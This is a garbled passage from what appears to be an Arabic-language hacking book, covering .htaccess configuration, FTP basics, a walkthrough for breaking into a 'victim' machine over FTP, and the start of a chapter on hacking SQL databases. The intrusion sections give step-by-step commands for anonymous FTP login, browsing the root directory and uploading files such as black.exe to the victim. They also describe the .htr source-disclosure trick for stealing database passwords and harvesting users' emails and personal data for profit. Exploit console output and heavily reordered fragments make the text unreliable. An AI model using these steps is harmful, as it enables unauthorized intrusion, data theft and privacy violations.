بعد كده و يقولي ياواد يا ايسر اعمل ايه‬ search.. root@IcEr:~/# .04 STEP 3 : Checking if we can reach our return address by format string (STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now . ‫طيب‬ ‫لكن لو كانت الخاصيه‬..0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown (uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp !Bang! You have root ‫شوف المر ده‬.0(1) from rpm Return Address: 0x08075844. access restrictions apply 230 STEP 2 : Skipping...net 2.6.2.STEP 5 : Sending code.01:03.

‬‬ ‫عشان كده لزم تقرا السورس بتاع الكسبلويت‪.‬و كل اكسبلويت لها ساينتكس و شغل‬ ‫خاص بيها‪.‬يبقى مش حنعرف نكمل الكلم ده‬ ‫عشان الكسبلويت مش تشتغل ‪.‫دي مش موجوده ‪..‬في هذه الحاله الكسبلويت مش تشتغل ال لو معانا باسورد و يوزر نيم‬ ‫عشان نخش على الف تي بي بتاع الموقع‪...‬‬ ‫انتهى‪،،،‬‬ ‫" شرح ملف ‪" htaccess‬‬ ‫‪210‬‬ ...‬بس المبادئ الساسيه و احده‪.

‫>ةةةةة<‬
‫>ةةةةةة‪< BSD-r00t :‬‬
‫|‬

‫| * مقدمـــة‬
‫|‬
‫| * اهمية ملف ‪htaccess.‬‬
‫|‬
‫| * كيفية عمل ملف ‪htaccess.‬‬
‫|‬
‫| * عمل صفحات ‪ error‬خاصة‬
‫| * منع عرض محتويات المجلد الذي ل يوجد به ‪| index‬‬
‫|‬
‫| * منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫|‬
‫| * تحويل من يحاول فتح لينك للينك اخر‬
‫|‬
‫| * عمل الملف ‪.htpasswd‬‬
‫|‬
‫| *الحماية بواسطه ‪htaccess.‬‬
‫|‬
‫| * منع اظهار الملف ‪htaccess.‬‬
‫|‬
‫| * اضافة مستخدمين في الملف‬
‫|‬
‫| * جعل الصفحات تظهر بامتداد اخر‬
‫‪-------------------------------------------------‬‬‫* مقدمـــة‬
‫‪-----------‬‬‫من اهم وسائل حماية المواقع و اغلق بعض الجزاء فيه بكلمة سر ‪ ,‬و منع بعض الناس من دخل الموقع و‬
‫السماح‬
‫لغيرهم بالدخول ‪ ..‬هو استخدام الملف ‪ htaccess.‬و الذي يمكن عمل الكثير و الكثير به ‪.‬‬
‫و هذا الملف مخفي و محمي بكلمة سر‬
‫* اهمية ملف ‪htaccess.‬‬
‫‪----------------------‬‬‫‪ -1‬حماية اي جزء فيه بكملة سر‬
‫‪ -2‬عمل صفحات ‪ error‬خاصة بك‬
‫‪ -3‬منع عرض محتويات المجلد الذي ل يوجد به ‪index‬‬
‫‪ -4‬منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫‪ -5‬جعل صفحة البداية بأمتدادات غير ‪.. html , .asp.‬‬
‫‪ -6‬تحويل من يحاول فتح لينك للينك اخر‬
‫* كيفية عمل ملف ‪htaccess.‬‬
‫‪--------------------------‬‬‫يمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "‪ "Notepad‬عن طريق عمل للملف‬
‫حفظ باسم و نحفظ‬
‫الملف بهذا السم ‪ htacces.‬على ان يكون ليس امتداده ‪ txt.‬اي ان ليس هناك اسم للملف ‪ ,‬اذا لم تستطيع‬
‫ذلك‬
‫احفظ الملف باسم "‪ - "htaccess.‬علمتي التنصيص في اسم الملف ‪. -‬‬
‫* عمل صفحات ‪ error‬خاصة‬
‫‪-----------------------‬‬‫و الفائدة منها هو ان الموقع يظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على الموقع‬
‫سوف يظهر كان‬
‫الموقع به كل الثغرات و ذلك لن طريقة عمل السكانر هي انه يقوم بتطبيق كل ثغره على الموقع و يرصد‬
‫النتيجه‬
‫‪211‬‬

‫فاذا كان هناك اي تغير يظهر لك كأن الموقع عليه هذه الثغره ‪.‬‬
‫و يمكنك عمل صفحات ال ‪ error‬الخاصه ك عن طريق ‪-:‬‬
‫أ‪ -‬تصميم صفحات ال ‪ error‬اول‬
‫ب‪ -‬تحميل الصفحات على الموقع‬
‫ج‪ -‬اضافه السطر التابي في الملف ‪htaccess.‬‬
‫‪ErrorDocument error_num‬‬
‫‪directory_file‬‬
‫بخيث يكون ‪ error_num‬هو رقم الخطا " الرقام موجود بالسفل " و ‪ directory_file‬هو مكان‬
‫صفحه ال ‪ error‬التي‬
‫قمت بتصميمها ‪.‬‬
‫‪ErrorDocument 404‬‬
‫مثال ‪:‬‬
‫‪/errors/nfound.html‬‬
‫ال ‪ errors‬و ارقامها ‪- :‬‬
‫‪----------------------‬‬‫| ‪| Bad Syntax | 400‬‬
‫‪----------------------‬‬‫| ‪| Unauthorized | 401‬‬
‫‪----------------------‬‬‫|‬
‫| ‪Not Used | 402‬‬
‫‪----------------------‬‬‫| ‪| Forbidden | 403‬‬
‫‪----------------------‬‬‫| ‪| Not Found | 404‬‬
‫‪----------------------‬‬‫* منع عرض محتويات المجلد الذي ل يوجد به ‪index‬‬
‫‪----------------------------------------------‬‬‫بعض المواقع عند محاولة فتح اي دليل عليها و ل يكون به ملف ‪ index‬يقوم الموقع بسرد جميع محتويات‬
‫هذا الدليل‬
‫و لحل هذه المشكله توجد طريقتين ‪-:‬‬
‫أ‪ -‬وضع ملف ‪ index‬في كل المجلدات " و بالطبع هذا صعب جدا "‬
‫ب‪ -‬باستخدام الملف ‪ htaccess.‬عن طريق اضافه السطر التالي في الملف ‪-:‬‬
‫‪Options -Indexes‬‬
‫* منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫‪------------------------------------‬‬‫يمكنك باستخدام الملف ‪ htaccess.‬منع شخص معين من دخول الموقع بعد معرفة الي بي الخاصه به و‬
‫يمكنك التسفاده‬
‫من ذلك حيث يمكنك منع دخل الموقع لمن ل تريد كما يمكنك منع دخول الموقع لي شخص في اسرائيل‬
‫مثل ‪..‬‬
‫و يمكنك ذلك عن طريق اضافة السطر التالي في الملف ‪- :‬‬
‫???‪deny from ???.???.???.‬‬
‫حيث ان ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به ‪.‬‬
‫واذا اردت منع اي احد من دخول الموقع يمكنك اضافة السطر التالي ‪-:‬‬
‫‪deny from all‬‬
‫واذا اردت السماح لشخص معين بدخول الموقع يمكنك ذلك باضافة السطر التالي ‪-:‬‬
‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪allow from‬‬

‫‪212‬‬

‫حيث انا ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به‬
‫* تحويل من يحاول فتح لينك للينك اخر‬
‫‪------------------------------------‬‬‫وتسمى هذه العمليه ب ‪ Redirection‬وهي من اهم فوائد ‪ htaccess.‬الملف تستخدم مثل عند تغير‬
‫موقع ملف قديم‬
‫على الموقع الى مكان جديد فيمكنك باستخدام الملف ‪ htaccess.‬عند محاولة احد فتح احد الينك القديم‬
‫توجيه‬
‫الى الينك الجديد عن طريق اضافة السطر التالي في الملف ‪-:‬‬
‫???‪Redirect /somewhere/???.???/???.‬‬
‫‪http://www.site.com/newlocation‬‬
‫بحيث يكون ‪ ???.???/somewhere/‬هو مكان الملف القديم و‬
‫‪ ???.???/http://www.site.com/newlocation‬هو مكان‬
‫الملف الجديد‪.‬‬
‫‪---------‬‬‫* عمل الملف ‪.htpasswd‬‬
‫‪-----------------------‬‬‫ويمكنك تقوم بعمله بنفس طريقة الملف ‪ , htaccess.‬و سوف نعمله تى نسطيع استخدام الملف ‪.‬‬
‫‪htaccess‬‬
‫في الحماية و سوف نكتب في الملف ‪ htpasswd‬ما يأتي ‪-:‬‬
‫‪user1:EncryptedPwd1‬‬
‫‪user2:EncryptedPwd2‬‬
‫‪ o‬حيث ان ‪ user1 , user2‬هو اسم المستخدم ‪.‬‬
‫‪ o‬و ‪ EncryptedPwd1 , EncryptedPwd2‬هي كلمات السر ولكن مشفره و يمكنك تشفير اي‬
‫كلمة تريدها‬
‫عن طريق الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫او‬
‫‪http://www.e2.u‬‬‫‪net.com/htaccess/make.htm‬‬
‫فمثل لو اردنا وضع يوسر باسم ‪ Security‬و كلمة السر الخاصة به هي ‪ fu93hds3‬نذهب اول الى‬
‫الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫‪ o‬و ‪username : Security‬‬
‫‪ o‬و ‪passwrod & re-enter password : fu93hds3‬‬
‫‪ o‬و نضغط على الزر ‪ claculate‬لتظهر النتيجه ‪Security:893bNicBcwszw <--‬‬
‫و الن قد اتممنا عمل الملف ‪ htaccess.‬و الذي قمنا بعمله و ذلك لكي نستطيع استخدام الملف ‪.‬‬
‫‪htaccess‬‬
‫للحماية بكلمة سر و يوسر ‪.‬‬
‫* الحماية بواسطه ‪htaccess.‬‬
‫‪---------------------------‬‬‫و تعتبر الفائدة الرئيسية للملف حيث انه يمكن منع اي احد من دخول دليل معين في الموقع ال اذا كان معه‬
‫كلمة السر و اليوسر نيم ‪ ,‬فيمنكنك عن طريقها عمل منتدى خاص او اي شئ تريد‪.‬‬
‫فعند وضع الملف ‪ htaccess.‬في اي دليل و حاول احد دخول هذا الدليل او اي جزء يندرج تحته سوف‬
‫يطلب منه‬
‫كلمة سر و يوسر ‪.‬‬

‫‪213‬‬

‫و يمكنك عمل ذلك عن طريق اضافة ما يأتي في الملف قبل نسخه في الدليل المراد حمايته ‪--:‬‬
‫‪AuthUserFile /somewhere/.htpasswd‬‬
‫"‪AuthName "Enter your user and passed‬‬
‫‪please‬‬
‫‪Require valid-user‬‬
‫‪AuthType Basic‬‬
‫>‪<Limit GET POST‬‬
‫‪require valid-user‬‬
‫>‪<Limit/‬‬
‫‪ o‬بحيث يكون ‪ /somewhere/.htpasswd‬هو مكان ملف ‪ htpasswd.‬على موقعك‬
‫‪ o‬و يكون ‪ Enter your user and passed please‬هي الرساله التي سوف تظهر لتطلب كلمة‬
‫السر‬
‫* منع اظهار الملف ‪htaccess.‬‬
‫‪----------------------------‬‬‫قد عرفنا الن ان لهذا الملف اهميه كبيره فيجب علينا ان نحميه جيدا ‪ ,‬فالبرغم من ان الملف مخفي ال‬
‫انه غير سالم من ان يكون السرفر نفسه غير مؤمن او انه هناك تصريح خطأ ‪..‬‬
‫لذلك سوف نمنع عرض هذا الملف عن طريق اضافة ما يأتي ‪- :‬‬
‫>‪<Files .htaccess‬‬
‫‪order allow,deny‬‬
‫‪deny from all‬‬
‫>‪<Files/‬‬
‫فاذا حاول احد عرض الملف سوف يظهر له ‪. error 403‬‬
‫* جعل الصفحات تظهر بامتداد اخر‬
‫‪------------------------------‬‬‫ويمكن باستخدام هذه الخاصية عمل ملف يظهر كأن امتداده ‪ html.‬و لكنه ذو امتداد ‪ txt.‬مثل ‪.‬‬
‫باضاف السطر التالي ‪-:‬‬
‫‪AddType text/plain html‬‬
‫ويمكنك رؤية كافى التغيرات التي يمكنك عملها في هذا الملف ‪-:‬‬
‫‪http://www.pharaonics.net/books/MIME.txt‬‬
‫انتهى‪،،،‬‬

‫" نظام نقل الملفات ‪" FTP‬‬

‫‪214‬‬

‫>ةةةةة ةة ةةةةة ةةةةة<‬
‫>ةةةةةة‪ :‬ةةةةةة<‬
‫ما هو نقل الملفات ‪ FTP‬؟‬
‫‪ FTP‬هي اختصار لكلمة ‪ File Transfer Protocol‬وتعني بروتوكول نقل الملفات‪ ،‬وهذه الخدمة هي‬
‫احدى تسهيلت ‪ TCP/IP‬التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات‬
‫‪ FTP‬الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم‬
‫تشغيل مختلفة وعليه فلديها أشكال ‪ Formats‬مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم‬
‫به ‪ ,FTP‬وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفًا في أميركا الى جهازنا ‪.‬‬
‫أقسام نقل الملفات‪:‬‬
‫نقل الملفات ينقسم الى قسمين‪:‬‬
‫تنزيل الملفات ‪:Download‬‬
‫وهو جلب الملفات من الكمبيوتر المضيف ‪ Host‬الى الجهاز المحلي ‪.Local‬‬
‫ارسال الملفات ‪:Uplaod‬‬
‫وهو ارسال الملفات من الكمبيوتر المحلي ‪ Local‬الى الكمبيوتر المضيف ‪.Host‬‬
‫ومن الناحية المنية فهناك نوعان لنقل الملفات‪:‬‬
‫نقل مؤمن ‪:Secure FTP‬‬
‫تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف‪.‬‬
‫نقل مجهول ‪:Anonymous FTP‬‬
‫لتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالبًا استخدام ‪ guest‬أو ‪ anonymous‬عوضًا‬
‫عنهما‪.‬‬
‫تصنف مصادر البرامج على النترنت الى ثلثة أقسام‪:‬‬
‫ملكية عامة ‪:Public Domain‬‬
‫وضعت البرامج هنا للستخدام العام فليس هناك حقوق ملكية لحد ول قيود على استخدامها وتوزيعها‬
‫وتعديلها‪.‬‬
‫مصادر مجانية ‪:Freeware‬‬
‫يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ول يجوز تعديلها أو بيعها‪.‬‬
‫مصادر مشتركة ‪:Shareware‬‬
‫يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جميع المميزات ويجب تحطيم النسخ بعد‬
‫‪215‬‬

‫انتهاء مدتها‪.‬‬

‫‪ FTP‬و الفيروسات ‪:‬‬
‫يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين‬
‫‪:ASCII‬‬
‫اختصارًا لـ)‪ (American Standard Code for Information Interchange‬والملفات من‬
‫هذا النوع تحتوي على سبعة جزيئات ‪ bits‬تتراوح قيمتها بين الصفر و ‪ .127‬ويستخدم هذا المصطلح‬
‫للتعبير عن المعيار الذي يقوم بتحويل الحرف الى أرقام في الكمبيوتر‪ .‬وتستخدم الملفات النصية هذا النوع‬
‫من الصيغ‪.‬‬
‫‪:Binary‬‬
‫وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات ‪ bits‬تتراوح بين الصفر و ‪ 255‬وتندرج‬
‫الصور والبرامج والملفات المضغوطة تحت هذا النوع‪.‬‬
‫والفيروسات ل يمكن أن تنتقل عبر ملفات ‪ ASCII‬كما ليمكن أن تنتقل عبر الصور كصيغ & ‪jpg & gif‬‬
‫‪ bmp‬وغيرها من امتدادات الصور ول عبر ملفات الفيديو والصوت مثل ‪avi - ram - mpg - mp3 -‬‬
‫‪ wav‬وغيرها‪ ،‬وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة‬
‫ماتكون‪exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :‬‬
‫‪ ،b64 - bhx‬كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات ‪ ،MS Office‬لذلك احذر من هذه‬
‫الملفات وافحصها دائمًا قبل تشغيلها‪.‬‬

‫طريقة نقل الملفات ‪: FTP‬‬
‫هناك طرق عديدة لنقل الملفات وهي‪:‬‬
‫نقل الملفات باستخدام نظام ‪UNIX‬‬
‫تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر ‪:UNIX‬‬
‫‪ :ascii‬لنقل ملفات ‪ ASCII‬النصية‪ ،‬وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب‬
‫اعادة المر‪.‬‬
‫‪ :binary‬لنقل الملفات الثنائية‪ ،‬وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة‬
‫المر‪.‬‬
‫‪ :status‬لفحص الملف ومعرفة هل هو من نوع ‪ ASCII‬أو ‪.Binary‬‬
‫‪ :help‬لعرض قائمة بأوامر ‪.UNIX‬‬

‫‪216‬‬

‬‬ ‫‪ :cd directory‬تغيير الدليل‪.‬‬ ‫‪ :get filename‬جلب الملف المطلوب وانزاله على جهازك‪.net/lunexx.‬‬ ‫‪:mget filename‬جلب مجموعة من الملفات‪.‬‬ ‫نقل الملفات باستخدام المتصفح ‪:Browser‬‬ ‫نقل الملفات عن طريق المتصفحات سهل جدًا فما عليك سوى ادخال عنوان الموقع ‪ URL‬ويبدأ العنوان‬ ‫بكلمة ‪ ftp://‬ثم العنوان بدًل من كلمة ‪ http://‬للعناوين العادية‪ ،‬بعد الدخول الى موقع الـ ‪ FTP‬ستأتي‬ ‫الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لنزاله‪.com‬ثم في خانة ‪ Host Type‬اختر ‪ Auto Detect‬لكي يقوم بالتدقيق‬ ‫التلقائي في نوع نظام الجهاز المضيف‪ ،‬بعد ذلك قم بكتابة السم في خانة ‪ User ID‬وهو مث ً‬ ‫ل‬ ‫‪ IronPrivate‬ثم الرقم السري في خانة ‪ Password‬وسيظهر مخفيًا على هيئة نجوم ******‪ .‬‬ ‫وهو مث ً‬ ‫وإذا أردت المزيد من المعلومات عن نظام الـ ‪Unix‬‬ ‫عليك الدخوول الى هذا الموقع ‪:‬‬ ‫‪http://www.Ws_ftp‬‬ ‫استخدام برنامج ‪:Ws_ftp LE 5.06‬‬ ‫ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج‪ ،‬سيظهر لك مربع حوار ‪Session‬‬ ‫‪ Profile‬والذي من خلله تقوم بتسجيل الدخول‪ ،‬اكتب في خانة ‪ Profile Name‬اسم حساب الدخول؛‬ ‫على سبيل المثال ‪ My Home Page In Tripod‬واكتب في خانة ‪ Host Name‬اسم الملقن وفي هذا‬ ‫المثال هو ‪ ftp.‬‬ ‫‪ :bye‬انهاء الرتباط والخروج من النظام البعيد‪.pc-worlds.com‬ثم ندخل السم وهو عل سبيل المثال "‪ ،"IronPrivate‬ثم نقوم بادخال الرقم السري‬ ‫ل "******"‪ .tripod.‬ثم اضغط‬ ‫‪ .tripod.‬وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر ‪ Unix‬المعتادة‪.OK‬كما في الشكل التالي‪:‬‬ ‫‪217‬‬ .‬‬ ‫‪ :pwd‬طباعة الدليل الحالي‪.‬‬ ‫نقل الملفات باستخدام حساب ‪:SLIP/PPP‬‬ ‫أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة ‪ .‫‪ :dir‬عرض محتويات الدليل‬ ‫‪ :ls‬عرض محتويات الدليل الحالي‪.Client Programs‬وأفضل‬ ‫برنامج تابع يمكن استخدامه للنوافذ ‪ Windows‬هو برنامج ‪.‬‬ ‫نقل الملفات باستخدام حساب ‪:Shell‬‬ ‫ل سوف تدخل‬ ‫أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمث ً‬ ‫حسابك في ‪ Tripod‬عن طريق ‪ ،Unix Shell‬نكتب أوًل المر ‪ ftp‬متبوعًا بالوجهة المرادة فيصبح‪ftp :‬‬ ‫‪ ftp.html‬‬ ‫فهو يفيد المبتدئين فى هذا النظام ‪.

‬الخ‪ .‬‬ ‫مضيف جاع ً‬ ‫اذا كان الجهاز البعيد يستخدم نظام ‪ Windows‬فل مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض‬ ‫الوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالوامر اللزمة‪.‬من ‪ Connect‬اختر ‪Remote‬‬ ‫‪ ..Exit‬‬ ‫انتهى‪،،،‬‬ ‫" الختراق عن طريق ‪"FTP‬‬ ‫‪218‬‬ .‬ويختلف العرض حسب نظام الكمبيوتر المضيف‪.‫بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم اليسر‬ ‫هو جهاز الكمبيوتر لديك والقسم اليمن هو جهاز الكمبيوتر المضيف‪ ،‬في هذه المرحلة تستطيع جلب أو‬ ‫ارسال الملفات أو تغيير اسمائها أو حذفها ‪ .‬‬ ‫ استخدام برنامج ‪ Telnet‬من ‪:Windows‬‬‫ل يسمى ‪ Telnet‬يمكنك الدخول عليه بالضغط على قائمة ابدأ ‪ Start‬ثم‬ ‫ترفق ‪ Windows‬برنامجًا سه ً‬ ‫تشغيل ‪ Run‬ثم اكتب ‪ Telnet‬وستنفتح لك صفحة البدء للبرنامج‪ .‬أي تستطيع التحكم في محتويات حسابك على النترنت أو‬ ‫على جهازك بسهولة فائقة‪.System‬في صندوق الحوار ‪ Connect‬الذي سيظهر لك اكتب في خانة ‪ Host Name‬اسم ملقن‬ ‫الجهاز المضيف ثم اكتب في خانة ‪ Port‬الميناء أو المنفذ ) اذا كان لديك( او اتركه كما هو‪ ،‬ثم اختر من الـ‬ ‫‪ ، Term Type‬ان كان لديك وال قم بالتجربة‪ ..‬بعد ذلك اضغط ‪ Connect‬وعندما يتم الربط فستحتاج‬ ‫لدخال السم والرقم السري‪ .‬وبعد النتهاء من النقل اختر ‪ Disconnect‬من قائمة ‪ Connect‬وبعد ذلك‬ ‫اختر ‪..‬‬ ‫نقل الملفات باستخدام التصال الشبكي البعيد ‪:Telnet‬‬ ‫‪ Telnet‬هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر‬ ‫ل جهازه وكأنه جزء من ذلك الكمبيوتر البعيد‪ .

send identify (e-mail name) as 331‬‬ ‫‪.assassin.(websrv1 Microsoft FTP Service (Version 4.0 220‬‬ ‫و الن أكتب الكتابة التالية‬ ‫‪ftp>quote user ftp‬‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Anonymous acces allowed.password‬‬ ‫و الن أكتب الكتابة التالية‬ ‫‪ftp>quote cwd ~root‬‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Please login with USER and PASS 530‬‬ ‫ثم أكتب الكتابة التالية‬ ‫‪ftp>quote pass ftp‬‬ ‫‪219‬‬ .com‬‬ ‫‪.‫>ةةةةة ةة ةةةةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< hacker dz :‬‬ ‫اليوم سوف نتناول طريقة إقتحام عبر فتيبي‬ ‫‪FTP‬‬ ‫أول و لنجاح القتحام يجب ان يكون لدى الضحية البور‬ ‫‪21‬‬ ‫مفتوح و هو البور الخاص ب‬ ‫‪FTP‬‬ ‫و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها‬ ‫‪Superscanne‬‬ ‫بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي‬ ‫إضغط على‬ ‫‪Start‬‬ ‫ثم‬ ‫‪Run‬‬ ‫ثم اكتب‬ ‫‪ftp –n‬‬ ‫سوف تطلع لك نافدة في الدوس مكتوب عليها‬ ‫‪<FTP‬‬ ‫ؤوكي لحد هنا كل شيء تمام‬ ‫و بعدين اكتب‬ ‫‪Open‬‬ ‫ثم إضغط على‬ ‫إدخال‬ ‫‪Enter‬‬ ‫سوف تتحصل عب النتيجة التالية‬ ‫‪<FTP‬‬ ‫‪To‬‬ ‫أكتب بجانب‬ ‫‪To‬‬ ‫رقم البي للضحية ثم إضغط على إدخال‬ ‫و الن خد بالك معي‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Connected to www.

System status.Command not implemented.File status okay. or system help reply‬‬ ‫‪211‬‬ ‫‪.exe‬‬ ‫‪Clos‬‬ ‫لقطع التصال مع الضحية‬ ‫هدي أهم الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق‬ ‫الوام و شرحها و ارقامها‬ ‫‪:Codes:‬‬ ‫‪Signification‬‬ ‫‪. superfluous at this site‬‬ ‫‪202‬‬ ‫‪.Directory status‬‬ ‫‪212‬‬ ‫‪220‬‬ .Restart marker reply‬‬ ‫‪110‬‬ ‫‪(Service ready in nnn minutes.Data connection already open. transfer starting‬‬ ‫‪125‬‬ ‫‪.Anonymous user logged in 230‬‬ ‫مبروك أنت الن في جهاز الضحية‬ ‫ما عليك الن ال ان تقوم بإستعمال‬ ‫اوامر الفتيبي‬ ‫و طبعا لن امر عليها مرور الكرام لكي ل تقعو في المشكلة الي وقعت فيها و هي نجاح القتحام من دون ما‬ ‫أعرف و ل فكرة على اوامر الفتيبي و إدا اردتم ان تضحكو بقاليأكثر من ‪ 20‬دقيقة و انا مجمد اليدي و‬ ‫الضحية عالقة من دون أن أعمل أي شيء و لهدا‬ ‫قمت بحضير الىوامر لكي تطبقوها مباشرةا بعد نجاح القتحام‬ ‫‪Pwd‬‬ ‫لكي تعر ما يحتويه الهارد ديسك‬ ‫‪Cd‬‬ ‫لقتحام مجلد مثال‬ ‫‪Cd black‬‬ ‫في هدا المثال قمت بإقتحام مجلد المسمى بلك‬ ‫‪Ls‬‬ ‫لكي يتضح لك محتوى المجلد أو الهارد ديسك‬ ‫‪Get‬‬ ‫لكي تحمل الى سطح المكتب بتاع جهازك‬ ‫مثال‬ ‫‪Get black.Command okay‬‬ ‫‪200‬‬ ‫‪. (nnn est un temps‬‬ ‫‪120‬‬ ‫‪.exe‬‬ ‫‪Put‬‬ ‫العملية العكسية ل‬ ‫‪Get‬‬ ‫يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في‬ ‫في جهاز الضحية‬ ‫مثال‬ ‫‪Put black.‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫و نجحت في القتحام‬ ‫‪. about to open data connection‬‬ ‫‪150‬‬ ‫‪.

need password .User logged in. no transfer in progress . command unrecognized 500 .User name okay. closing control connection .Closing data connection .NAME system type .Requested action aborded: page type unknown 551 .. (Fichier non trouvé..Service ready for new user .Command not implemented 502 .possible .Data connection open. (Fichier déjà utilisé par autre 213 214 215 220 221 225 226 227 230 250 257 331 332 350 421 425 426 450 (chose .PATHNAME" created" .Requested file action pendingfurther information . transfer aborded Requested file action not taken.Syntax error in parameters or arguments 501 .Syntax error. (Nom de fichier non attribué 553 ،،،‫انتهى‬ " SQL ‫" اختراق الـ‬ 221 ..Requested action aborded: local error processing 451 Requested action not taken. h2. completed .Connection closed.. (Pas assez de mémoire pour 452 (exécuter l'action .Can't open data connection . h3.Need account for storing files 532 Requested action not taken. proceed .Requested file action okay.File status .Not logged in 530 .Requested file action aborded 552 (Requested action not taken. p2 . p1.Command not implemented for that parameter 504 .Bad sequence of commands 503 .Service not available.Need account for login . pas d'accès 550 (.Help message .Service closing control connection . h4.(Entering passive mode (h1.

asp+.+‬‬ ‫كيف تستخدم هذه الثغرة ‪:‬‬ ‫‪http://target/page.‬‬ ‫س ‪ :‬مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ SQL‬؟‬ ‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات ‪ PHP‬بل منتديات ‪ ASP‬في الغالب‬ ‫سوف تحصل على جميع اسماء‬ ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ‪ ،‬اما اذا كان‬ ‫الموقع يحتوي على ميزة‬ ‫قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ‪ ،‬عندها قم بانشاء شركة للدعاية والعلن‬ ‫وسوف تصبح ثريا اذن لتنسى ‪_LinuxRay‬‬ ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص ‪ -‬ارقام هواتف ‪ -‬عناوين ‪ -‬تورايخ الميلد ‪،‬‬ ‫ممكن ان تصبح ‪. Administrator‬‬ ‫اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ‪.‬هناك ثغرات كثير يمكن‬ ‫ان تحصل منها على كلمات المرور مثل ثغرة ‪htr.htr‬‬ ‫‪ : target‬الموقع الهدف‬ ‫‪ : Page‬صفحة ‪asp‬‬ ‫‪ : htr...‬اعرف انك سوف تتساءل مالفائدة‬ ‫اذن منها الفائدة هو‬ ‫خلف هذه الصفحة البيضاء اذهب الى ‪ View Source‬لكي ترى اوامر البرمجة الخاصة ب ‪ ASP‬التى‬ ‫ليمكن لك ان تراها في الوضع العادي ‪ :‬مثل‬ ‫‪222‬‬ ...‬‬ ‫س ‪ :‬مالذي تحتاجة للدخول على قواعد بيانات ‪ SQL‬؟‬ ‫تحتاج فقط لل ‪ User Name‬و ‪Passwd‬‬ ‫س ‪ :‬من اين احصل على اسم المستخدم وكلمة المرور ؟‬ ‫هناك طرق عديدة للحصول على ‪ User name and Passwd‬منها كما اسلف صفحات ال ‪ASP‬‬ ‫وملفات اخرى من نوع *‪ sql.‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< linuxray :‬‬ ‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬ ‫الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬ ‫‪ ASP‬هي صفحات تسحب بياناتها‬ ‫من قاعدة ‪ SQL‬وصفحات ‪ ASP‬ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ‪ SQL‬وهذا‬ ‫ماسوف اشير اليه لحقا ‪ ،‬و ‪SQL‬‬ ‫تتنصت على البورت ‪1433‬‬ ‫ايضا مااريد ان اخبرك به ان ال ‪ SQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬ ‫عدد من الجداول يمكن‬ ‫ان تتصور كبرقواعد بيانات ‪ SQL‬والعدد الكبير من 